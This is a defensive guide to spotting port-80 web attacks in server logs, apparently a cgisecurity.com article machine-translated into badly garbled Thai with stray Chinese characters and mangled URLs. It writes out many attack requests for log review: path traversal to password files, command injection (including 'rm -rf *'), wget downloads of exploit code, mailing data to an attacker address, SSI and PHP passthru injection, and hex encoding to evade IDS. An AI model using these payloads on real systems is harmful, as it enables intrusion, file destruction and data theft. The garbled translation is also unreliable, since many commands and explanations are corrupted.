สรุป I.
II . รายละเอียดของ
III . ความ
IV . การวิเคราะห์ Spillover
แปลงรหัส V.
VI . สรุป
[] บทคัดย่อ
เว็บไซต์ 80 เป็น port บริการเริ่มต้นในปัญหาด้านความปลอดภัยต่างๆให้มันออกบางช่องโหว่ให้โจมตีเพื่อเข้าสู่ระบบหรือสิทธิผู้ดูแลระบบเพื่อเข้าสู่เว็บไซต์ภายในต่อไปนี้เป็นพอร์ต Zenomorph ติดตามวิธีการโจมตีบาง 80 วิจัยและบอกวิธีการค้นหาปัญหาจากตำแหน่งล็อก
] Detail [
ที่นี่ในส่วนผ่านจำนวน Lie Zi แสดงคู่เว็บเซิร์ฟเวอร์และการประยุกต์ใช้ในการโจมตีทั่วไปของพวกเขาและร่องรอยของที่เฉพาะ Liezi แสดงโจมตีผู้นำและไม่รายการทุกรูปแบบการโจมตีส่วนนี้จะ รายละเอียดของแต่ละบทบาทของการโจมตีและวิธีการใช้ประโยชน์จากช่องโหว่การโจมตีของ
ขอ "..." (1)". "".. "และ
เครื่องหมายเหล่านี้โจมตีมากทั่วไปสำหรับเว็บ应用โปรแกรมและเว็บเซิร์ฟเวอร์ที่ถูกนำมาใช้เพื่อให้โจมตีหรือหนอนไวรัสทางโปรแกรม Gaibian เว็บเซิร์ฟเวอร์ได้รับการเข้าถึง非พื้นที่สาธารณะ ส่วนใหญ่โปรแกรม CGI กับข้อบกพร่องเหล่านี้".. ขอ"
ตัวอย่างเช่น
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
นี้จะแสดงโจมตีขอ Liezi mosd แฟ้มนี้หากผู้โจมตีสามารถฝ่าฟัน web server ไดเรกทอรีรากแล้วได้รับข้อมูลเพิ่มเติมและขอรับสิทธิประโยชน์เพิ่มเติม
(2)"% 20"ขอ
20% เป็นค่า hex ที่ 16 คันแม้ว่านี้ไม่ได้หมายความว่าคุณสามารถใช้อะไร แต่เมื่อคุณดูบันทึกจะพบว่าบางโปรแกรมเว็บเซิร์ฟเวอร์ที่ทำงานในลักษณะนี้อาจจะดำเนินการอย่างมีประสิทธิภาพ ดังนั้นคุณควรตรวจสอบบันทึก ในขณะที่ร้องขอบางครั้งสามารถช่วยดำเนินการบางคำสั่ง
ตัวอย่างเช่น
http://host/cgi-bin/lame.cgi?page=ls% | 20 - al
นี้ Liezi แสดงโจมตีเพื่อรันคำสั่ง unix, รายการสารบบทั้งหมดแฟ้มชิง Qiu ทำให้โจมตีการเข้าถึงไฟล์สำคัญในระบบของคุณและช่วยให้เขามีเงื่อนไขการรับสิทธิพิเศษ
(3)"% 00"ขอ
00% กล่าวว่าฐานสิบหก 16 ไบต์ว่างเขาสามารถหลอกใช้เว็บและขอชนิดของไฟล์
ตัวอย่าง :
http://host/cgi-bin/lame.cgi?page=index.html
นี้อาจจะขอที่ถูกต้องในเครื่องถ้าผู้โจมตีทราบคำขอนี้สำเร็จแล้วเขายังจะมองหาวิธีการ cgi
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
บางทีโปรแกรม cgi ไม่ยอมรับคำขอนี้เพราะขอให้ตรวจสอบคำต่อท้ายชื่อไฟล์เช่น : ประเภท html.shtml หรืออื่น ๆ ของไฟล์ โปรแกรมส่วนใหญ่จะบอกชนิดของแฟ้มที่ร้องขอไม่ถูกต้องครั้งนี้ก็จะบอกถูกโจมตีไฟล์ต้องของตัวอักษรต่อท้ายประเภทแฟ้มดังนั้นผู้โจมตีสามารถได้รับเส้นทางระบบไฟล์ชื่อผล ระบบของคุณข้อมูลที่สำคัญเพิ่มเติม
00html% http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
สนใจขอนี้จะโกงโปรแกรม cgi ว่าเอกสารนี้เพื่อกำหนดประเภทไฟล์ที่ยอมรับได้บางโปรแกรมการตรวจมีประสิทธิภาพเป็นแฟ้มขอโง่ซึ่งเป็นที่นิยมใช้วิธีการโจมตี
(4)"| ขอ"
นี้เป็นลักษณะท่อในระบบยูนิกซ์, ขอความช่วยเหลือในการดำเนินการตามคำสั่งหลายระบบในเวลาเดียวกัน
ตัวอย่างเช่น
# Cat access_log | grep - i".. "
(คำสั่งนี้จะแสดงบันทึกใน".. ขอ"ใช้ในการโจมตีและหนอน found)
มักจะพบว่าการใช้งานเว็บจำนวนมากใช้ตัวนี้นี้ได้นำไปสู่การเตือนที่ผิดพลาดใน IDS ล็อก
ระมัดระวังในการตรวจสอบการสมัครของคุณเพื่อประโยชน์จากการลดการเตือนที่ผิดพลาดในระบบตรวจจับการบุกรุก
นี่คือบางส่วนของ Lieh Tzu :
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
ขอคำสั่งนี้ต่อไปนี้มีการเปลี่ยนแปลงบางอย่างใน Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%% 20 - al | 20/etc
ขอนี้จะอยู่ในระบบ unix / etc directory ไฟล์ทั้งหมด
% http://host/cgi-bin/lame.cgi?page=cat% grep 20access_log | 20 -% i 20"อ่อนแอ"
การดำเนิน cat คำขอและคำสั่งคำสั่ง grep จะดำเนินการตรวจสอบออก"อ่อนแอ"
(5)"; ขอ"
ในระบบ unix, ลักษณะนี้ช่วยให้การดำเนินบรรทัดคำสั่งหลาย
ตัวอย่างเช่น
Id #; uname - a
(ดำเนินการคำสั่ง id ตามด้วยการดำเนินการตามคำสั่ง uname)
โปรแกรมเว็บบางกับตัวนี้อาจทำให้คุณ IDS บันทึกเตือนความล้มเหลวของคุณควรตรวจสอบโปรแกรมเว็บของคุณเพื่อให้คุณลดความเสี่ยงจากความล้มเหลวของการแจ้งเตือน IDS
(6)" "และ"Request"
ควรตรวจสอบบันทึกบันทึกสองตัวอักษรจำนวนเหตุผลของคุณคือคนแรกเป็นตัวอักษรที่บันทึกข้อมูลในเอกสาร
ตัวอย่าง 1 :
"Echo"hax0red h0 h0 ของคุณ" / etc / motd (ขอ motd เขียนข้อมูลในเอกสารนี้)
ผู้โจมตีสามารถใช้ขอเป็นไปเจาะกับหน้าเว็บของคุณ เช่น RDS มีชื่อเสียงประโยชน์โจมตีมักใช้ในการเปลี่ยนแปลงหน้าเว็บ
2 :
% http://host/something.php=Hi 20mom% 20Im% 20Bold!
Html คุณจะพบว่าภาษาของสัญญาณที่นี่เขายังใช้ตัวอักษร " "," ", การโจมตีดังกล่าวไม่สามารถทำให้ผู้โจมตีเข้าถึงระบบจะสับสนคิดว่าคนนี้เป็นเว็บข้อมูลที่ถูกต้องเว็บไซต์ (นำไปสู่ ผู้เยี่ยมชมลิงค์นี้เพื่อเยี่ยมชมโจมตีตั้งอยู่ที่ขอนี้อาจเข้ารหัสเป็น hex 16 ตัวอักษรในแบบฟอร์มเพื่อให้ร่องรอยของการโจมตีจะไม่ชัดเจนดังนั้น)
(7)"!"ขอ
ภาษาสามัญที่อักขระขอนี้ SS (Server Side รวม) I โจมตีหากผู้โจมตีสามารถโจมตีสับสนผู้ใช้คลิกตั้งค่าการเชื่อมโยงและเหมือนกับข้างต้น
ตัวอย่างเช่น
http://host1/something.php =
สุ Lieh จะโจมตีสามารถทำมันให้ไฟล์ที่ host2 เว็บไซต์จาก host1 ปรากฏเหนือ (แน่นอนต้องมีผู้เข้าชมการตั้งค่าการเชื่อมต่อการโจมตีของ . ขอนี้อาจเปลี่ยนเป็น หน้ากากเข้ารหัส 16 hex, ไม่พบได้อย่างง่ายดาย)
ในเวลาเดียวกันวิธีนี้ยังสามารถรันคำสั่งอำนาจในเว็บไซต์
ตัวอย่างเช่น
http://host/something.php =
Lieh ทำงานบนระบบระยะไกล"คำสั่ง"id จะแสดงรหัสผู้ใช้เว็บไซต์ของมักจะ"ไม่มี"หรือ"www"
แบบนี้ยังช่วยให้รวมไฟล์ที่ซ่อน
ตัวอย่างเช่น
http://host/something.php =
ไฟล์ที่ซ่อน . Htpasswd จะไม่ปรากฏ, Apache จะปฏิเสธที่จะกำหนดหลักเกณฑ์ดังกล่าว . HT แบบฟอร์มและโลโก้ SSI จะหลีกเลี่ยงข้อ จำกัด ดังกล่าวและนำไปสู่ปัญหาความปลอดภัย
(8)","ขอ
การโจมตีดังกล่าวที่ใช้ในการพยายามที่จะแทรกจากระยะไกล PHP การใช้งานในเว็บอาจสั่งให้ดำเนินการขึ้นอยู่กับการตั้งค่าเซิร์ฟเวอร์และปัจจัยอื่น ๆ ที่ทำงาน (เช่น php ตั้งเซฟโหมด)
passthru ตัวอย่าง : http://host/something.php = ("");? id
ในบางโปรแกรม php ง่ายอาจเป็นไปเว็บไซต์ในสิทธิของผู้ใช้ระบบจากระยะไกลเพื่อดำเนินการคำสั่งภายใน
(9)"""ขอ
ตัวนี้ใช้ในภายหลังเพื่อรันคำสั่งใน perl, ตัวอักษรในโปรแกรมเว็บไม่ได้ใช้บ่อยดังนั้นถ้าคุณเห็นในบันทึกของคุณควรระวังให้มาก
ตัวอย่างเช่น
http://host/something.cgi =`id`
เขียนโปรแกรม cgi perl ในคำถามจะนำไปสู่การปฏิบัติตามคำสั่ง id
[] เพิ่มเติม
ส่วนต่อไปนี้จะหารือการดำเนินการโจมตีเพิ่มเติมได้สั่งพร้อมกับเอกสารที่ต้องการและหากคุณมีคำสั่งข้อบกพร่องไกลปฏิบัติการก็ควรจะวิธีการตรวจค้นพบ นี่เป็นเพียงส่วนหนึ่งที่จะให้ความคิดที่ดีและระบบของคุณบอกอะไรเกิดขึ้น, attackers พยายามร่องรอยการโจมตีระบบของคุณ แต่ไม่ได้รายชื่อทั้งหมดของผู้บุกรุกที่จะใช้คำสั่งและการร้องขอ
"Bin / ls"
คำสั่งนี้แสดงเส้นทางทั้งหมดในโปรแกรม应用เว็บจำนวนมากมีข้อบกพร่องนี้หากคุณเข้าสู่ระบบในหลายสถานที่นั้นขอเป็นไปได้สำหรับช่องโหว่ขนาดใหญ่คำสั่งปฏิบัติการระยะไกล แต่ไม่จำเป็นต้องมีปัญหา อาจปลุกเท็จ เมื่อนึกถึงอีกโปรแกรมเว็บเขียน (cgi, ASP, PHP ... etc) พื้นฐานของความเป็น
ตัวอย่างเช่น
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% | 20 - al
http://host/cgi-bin/bad.cgi?doh=ls% 20 al;
cmd.exe""
นี่คือหน้าต่างของเปลือกผู้โจมตีหากคุณเข้าถึงและเรียกใช้สคริปต์นี้เงื่อนไขในการตั้งค่าเซิร์ฟเวอร์ให้上เครื่องอาจหน้าต่างทำอะไร, Henduo ไวรัสหนอนจะผ่าน 80 พอร์ตสื่อสารกับเครื่องระยะไกล
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e :
"Bin / id"
นี่คือสองแฟ้มไบนารีปัญหาและ bin / ls / เช่นหากคุณบันทึกในหลายสถานที่นั้นขอเป็นไปได้สำหรับช่องโหว่ขนาดใหญ่คำสั่งปฏิบัติการระยะไกล แต่ไม่จำเป็นต้องมีปัญหา อาจปลุกเท็จ
จะแสดงที่ส่วนหนึ่งเป็นของที่ผู้ใช้และกลุ่ม
ตัวอย่างเช่น
| http://host/cgi-bin/bad.cgi?doh=../../../../bin/id
http://host/cgi-bin/bad.cgi?doh=id;
"Bin / / rm"
คำสั่งนี้จะสามารถลบไฟล์โดยไม่ต้องใช้ให้ถูกต้องเป็นอันตรายมาก
ตัวอย่าง :
% http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm 20 rf - 20% * |
% http://host/cgi-bin/bad.cgi?doh=rm 20 rf -% 20 *;
"wget และ TFTP"คำสั่ง
คำสั่งเหล่านี้มักจะโจมตีอาจได้รับสิทธิประโยชน์เพิ่มเติมเพื่อดาวน์โหลดไฟล์ wget เป็นคำสั่ง unix ใต้อาจจะใช้ในการดาวน์โหลดแบ็, TFTP อยู่ภายใต้คำสั่ง unix และ nt, ใช้ในการดาวน์โหลดไฟล์ หนอนบาง IIS กระจายตัวเองโดย TFTP เพื่อคัดลอก virus เพื่อครอบครัวอื่นๆ
ตัวอย่าง :
20http% http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget : / / host2/Phantasmp.c | http:// host / cgi - bin / bad.cgi? DOH = 20http% wget : / / www.hwa-security.net/Phantasmp.c;
"คำสั่ง Cat"
คำสั่งนี้ใช้เพื่อดูเนื้อหาของไฟล์ที่ใช้ในการอ่านข้อมูลที่สำคัญเช่นแฟ้มการกำหนดค่าไฟล์รหัสผ่านไฟล์เอกสารเครดิตและคุณสามารถคิด
ตัวอย่าง :% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ % cat bad.cgi? DOH = 20/etc/motd;
"คำสั่ง Echo"
คำสั่งนี้ใช้ในการเขียนข้อมูลไปยังแฟ้มเช่น"index.html"
ตัวอย่าง : http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20"fc - # kiwis% 20here% 20was"% 20 % | 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20"fc - # kiwis% 20here% 20was"% 200day.txt 20 %;
"Ps คำสั่ง"
แสดงกระบวนการที่กำลังทำงานอยู่บอกโจมตีว่ารีโมทโฮสต์ที่ใช้ซอฟต์แวร์เพื่อให้ได้แนวคิดบางประเด็นความมั่นคงในการขอรับสิทธิเพิ่มเติม
ตัวอย่าง :% http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps | 20 - aux http://host/cgi-bin/bad cgi? DOH = 20% ps aux;
"ฆ่าและ killall"คำสั่ง
ระบบ Unix เพื่อฆ่ากระบวนการนี้โจมตีสามารถใช้คำสั่งนี้จะหยุดให้บริการระบบและกระบวนการสามารถลบร่องรอยของการโจมตีบางจะใช้ประโยชน์จากกระบวนการผลิตมากเด็ก
ตัวอย่าง :% http://host/cgi-bin/bad.cgi?doh=../bin/kill 20-9% 200% http://host/cgi-bin/bad.cgi?doh=kill | 20 -9% 200;
"คำสั่ง uname"
คำสั่งนี้จะบอกชื่อเครื่องโจมตีระยะไกลในบางครั้งผ่านทางเว็บไซต์นี้เพื่อให้ทราบว่า isp โจมตีที่อาจจะเข้าชมวันนี้ uname - a ขอปกติเหล่านี้จะถูกบันทึกไว้ในล็อกไฟล์
ตัวอย่าง :% http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname 20 | http://host/cgi-bin/bad % uname cgi? DOH = 20 - a;
"Cc, gcc, perl, หลาม, etc ... "รวบรวมตีความ / ของคำสั่ง
โจมตีผ่าน wget หรือ TFTP download ประโยชน์และมี cc compiler gcc, รวบรวมนี้เป็นโปรแกรมปฏิบัติการและสิทธิ์การเข้าถึงเพิ่มเติม
ตัวอย่าง :% 20Phantasmp.c http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc | http://host/cgi-bin/bad cgi? DOH = gcc% 20Phantasmp.c; . / a.out 20% p -% 2031337;
ถ้าคุณดูบันทึกพบ"งูหลาม"perl"คำแนะนำเหล่านี้อาจจะบุกรุกดาวน์โหลด perl script หลาม, และพยายามที่จะได้รับสิทธิ์ของท้องถิ่น
"คำสั่ง Mail"
โจมตีมักจะใช้ระบบคำสั่งนี้บางเอกสารสำคัญไปยังกล่องจดหมายของตัวเองโจมตีของ แต่ยังยินดีอีเมลระเบิดจะดำเนินการ
ตัวอย่าง :% http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ... "และคำสั่งอื่นๆ
ระบบ Unix เพื่อให้พวกเขาเปลี่ยนสิทธิ์แฟ้ม
chown = ให้ตั้งเจ้าของแฟ้ม chmod = สามารถกำหนดสิทธิ์แฟ้ม chgrp = ช่วยให้เจ้าของสิทธิ์ในการเปลี่ยนแปลงกลุ่มในแฟ้ม chsh = สามารถเปลี่ยนเปลือกของผู้ใช้
ตัวอย่าง :% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html;%% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown 20zeno 20 / etc / 20/bin/sh http://host/cgi-bin/bad.cgi?doh=chsh master.passwd |%; http://host/cgi-bin/bad.cgi?doh=../ . / .. / .. / bin /% 20nobody chgrp% | 20/etc/shadow
"/ etc / passwd"file
เป็นไฟล์รหัสผ่านของระบบมักจะเงาออกและไม่อนุญาตให้ดูรหัสผ่านที่เข้ารหัส แต่การโจมตีที่สามารถรู้ว่าสิ่งที่ถูกต้องผู้ใช้และเส้นทางสมบูรณ์ของระบบชื่อเว็บไซต์และข้อมูลอื่น ๆ ที่มักจะ โดยเงาออกเพื่อโจมตีปกติจะดู / etc file เงา /
"/ etc / master.passwd"
ไฟล์นี้เป็นไฟล์ BSD รหัสผ่านระบบมีรหัสผ่านการเข้ารหัสไฟล์ในบัญชีหลักเพียงอ่านอย่างเดียวในขณะที่จำนวนการโจมตีไร้ฝีมือจะเปิดภายในเขาพยายามอ่านเนื้อหา . หากเว็บไซต์นั้น สิทธิ์ root ทำงานแล้วโจมตีคือเราสามารถอ่านเนื้อหาภายในมากปัญหาที่ดูแลระบบจะมาหนึ่งหลังจากที่อื่น
"/ shadow etc /"
มีรหัสผ่านระบบเข้ารหัสอ่านเดียวกันในบัญชี root และ / et / master.passwd เกือบ
"/ etc / motd"
เมื่อผู้ใช้เข้าสู่ระบบ unix ข้อมูลที่ปรากฏในข้อความ"ของวัน"แฟ้มมีข้อมูลสำคัญและผู้ดูแลระบบของผู้ใช้ชุดบางผู้ใช้ที่ต้องการเห็นผู้ที่ไม่ ยังมีข้อมูลรุ่นระบบโจมตีจะเห็นไฟล์นี้จะเข้าใจสิ่งที่ระบบทำงานอยู่ในโจมตีขั้นตอนต่อไปคือการค้นหาชนิดนี้ระบบใช้ประโยชน์และการเข้าถึงระบบสิทธิพิเศษเพิ่มเติม
"/ etc hosts /"
เอกสารให้อยู่ ip และเครือข่ายข้อมูลผู้โจมตีสามารถเรียนรู้เพิ่มเติมเกี่ยวกับระบบของการตั้งค่าเครือข่าย
"/ usr / local apache / conf / httpd.conf"
นี้เป็น web server Apache แฟ้มการกำหนดค่าผู้โจมตีสามารถเข้าใจเช่น cgi, ssi ข้อมูลและอื่น ๆ สามารถเข้าถึงได้
"/ inetd.conf Etc /"
ไฟล์นี้เป็นค่าบริการ inetd ผู้โจมตีสามารถเรียนรู้เครื่องระยะไกลเริ่มบริการเหล่านั้นว่าจะใช้กระดาษห่อเพื่อควบคุมการเข้าถึงหาก wrapper พบว่าทำงานโจมตีขั้นตอนต่อไปจะตรวจสอบ"/ etc / hosts.allow"และ "/ etc /"hosts.deny, file, และที่อาจเปลี่ยนการตั้งค่าบางสิทธิ์
". Htaccess Htpasswd, . และ . Htgroup"
ไฟล์เหล่านี้มักจะใช้ในการตรวจสอบผู้ใช้ web site, โจมตีก็จะดูไฟล์เหล่านี้และได้รับชื่อผู้ใช้และรหัสผ่านรหัสผ่าน file . Htpasswd เข้ารหัสก่อนผ่านกะเทาะง่ายๆถอดรหัสเพื่อโจมตีที่ได้รับ พื้นที่คุ้มครอง (มักใช้กับชื่อผู้ที่เหมือนกันและรหัสผ่านที่ผู้โจมตียังสามารถเข้าดูบัญชีอื่น ๆ )
"Access_log และ error_log"
เหล่านี้เป็น apache เซิร์ฟเวอร์แฟ้มบันทึก, attackers มักจะดูไฟล์เหล่านี้ดูที่หน้านั้นจะถูกบันทึกและที่หน้าอื่น ๆ ที่แตกต่างกัน
โดยปกติการโจมตีจะแก้ไขแฟ้มบันทึกเหล่านี้เช่นข้อมูลที่อยู่ของตนเองโจมตีผ่านพอร์ต 80 ผ่านระบบของคุณและระบบสำรองของคุณยังไม่ได้มีการบันทึกสถานะไม่มีโปรแกรมระบบบันทึกอื่น ๆ ซึ่งจะ ตรวจจับการบุกรุกจะยากมากที่จะทำงาน
"[] Drive letter : winntrepairsam._ หรือ [ตัวอักษรไดรฟ์] : winntrepairsam"
file Windows NT ผ่านระบบหากคำสั่งจากระยะไกลไม่สามารถใช้, โจมตีมักจะขอเอกสารเหล่านี้แล้ว"crack l0pht"ประเภทของรหัสผ่านที่แตกเครื่องมือที่แตกหากบุกรุกจะพยายามโจมตีแฟ้มรหัสผ่านผู้ดูแลระบบหาก ประสบความสำเร็จแล้วเครื่องระยะไกลจะถูกโจมตีได้รับการควบคุม
[] การวิเคราะห์มากเกิน
ในบทความฉันจะไม่พูดมากเกินไปเกี่ยวกับล้นของหัวข้อนี้ผมจะให้สิ่งที่ปรากฏการณ์ที่และร่องรอยสำคัญและความกังวลโดยเฉพาะกันชนมักจะโจมตีโดยการแปลงรหัสโจมตีและยากที่จะหาวิธีการอื่น ๆ เพื่อให้บรรลุ
ที่นี่ Lie Zi ง่ายๆคือ
เช่น http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Liezi นี้แสดงโจมตีในใบสมัครส่งหลายตัวเพื่อทดสอบโปรแกรมหน่วยความจำล้น, หน่วยความจำล้นจะได้รับคำสั่งเรียกสิทธิ์รีโมทโฮสต์หากเจ้าของได้ setuid และขั้นตอนการรากผ่าน overflow ที่ สามารถใช้กับระบบทั้งหมดถ้าไม่ชอบโปรแกรม setuid แล้วล้นเท่านั้นโดยใช้สิทธิของผู้ใช้เว็บไซต์ของ
ที่นี่ไม่สามารถบอกทุกสถานการณ์ แต่คุณเป็นประจำควรตรวจ log file ของคุณหากวันนั้นก็พบมากหน้า แต่จะไม่เกินคำขอหมายความว่าคุณอาจจะโจมตีล้นแน่นอนอาจ เครือข่ายโจมตีใหม่หนอน
[แปลงรหัส]
All โจมตีดังกล่าวข้างต้นขอโจมตีมักจะรู้ระบบ IDS ขอตรวจสอบเชิงกลมักจะบุกรุกจะใช้ข้อมูลเครื่องมือการแปลงการแปลงรูปแบบเนื้อหาขอ 16 วงผล IDS จะละเลยหน้านี้ เราจะคุ้นเคยกับความเสี่ยง CGI สแกนเครื่องมือที่ดี Liezi มัสสุ ถ้าคุณดูบันทึกของเวลาที่พบจำนวนมาก 16 - band และไม่บางตัวกันแล้วโจมตีอาจลองใช้บางวิธีการในการโจมตีระบบของคุณ
วิธีที่รวดเร็วเป็น log file ของคุณขอที่ 16 hex ให้คัดลอกไปยังเบราว์เซอร์เบราว์เซอร์สามารถขอเปลี่ยนเป็นทางขวาแสดงเนื้อหาของคำขอถ้าคุณไม่ กล้าที่จะเสี่ยงนี้เป็นคน ASCII ง่ายสามารถให้รหัสที่ถูกต้อง
] สรุป [
บทความนี้ไม่ได้ครอบคลุมทั้งหมด 80 พอร์ตการโจมตี แต่ส่วนใหญ่ได้รับการอ้างอิงกว่าการโจมตีทั่วไปและบอกวิธีการตรวจสอบล็อกไฟล์ของคุณและวิธีการเพิ่มเช่นจำนวนกฎ IDS, เขียนเป้าหมายของเธอคือ web ผู้ดูแลระบบควรจะกังวลเกี่ยวกับความคิดที่ดีในเวลาเดียวกันฉันหวังว่าบทความนี้จะช่วยให้เว็บพัฒนาเว็บโปรแกรมเขียนโปรแกรมที่ดีกว่า
ของหมายเหตุ : ถ้าคุณมีความคิดเห็นและข้อเสนอแนะกรุณาส่ง admin@cgisecurity.com e - mail